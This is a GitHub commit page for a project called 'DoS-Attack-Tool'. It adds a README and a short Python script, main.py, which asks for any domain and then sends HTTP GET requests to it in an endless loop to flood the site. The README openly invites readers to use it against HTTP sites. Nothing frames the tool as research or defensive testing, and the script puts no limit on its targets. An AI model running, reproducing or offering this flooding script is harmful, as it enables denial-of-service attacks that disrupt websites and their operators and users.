Skip to content

Commit a0648df

Browse files
committed
master
1 parent 4d9193c commit a0648df

3 files changed

Lines changed: 30 additions & 2 deletions

File tree

README.md

Lines changed: 8 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,8 @@
1-
# DoS-Attack-Tool
2-
1+
# Dos HTTP attacker
2+
this is python app to dos to http site.
3+
4+
it cannot bypass cloudflare or any anti ddos.
5+
6+
but, it could be used! so you can use this tool as well.
7+
8+
LICENSE: [APPACHE 2](LICENSE)

main.py

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
import os
2+
from time import sleep
3+
import colorama
4+
from colorama import Fore
5+
from colorama import Back
6+
import requests
7+
os.system("cls")
8+
print(Fore.WHITE + Back.BLUE + "HTTP DOS ATTACKER\nMade by github.com/ghalbeyou !\n")
9+
sleep(5)
10+
os.system("cls")
11+
ip = input(">> DOMAIN: ")
12+
url = "http://" + ip
13+
os.system("cls")
14+
while True:
15+
print(Fore.RED + Back.BLACK + "\n>> Sending a new connecting ...")
16+
r = requests.get(url)
17+
if r.status_code == 200:
18+
print(Fore.GREEN + "\n>> Request send!")
19+
else:
20+
print(Fore.RED + "Cannot send, gotting this status code: " + str(r.status_code))

requirements.txt

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
colorama==0.4.4
2+
requests==2.27.1

0 commit comments

Comments
 (0)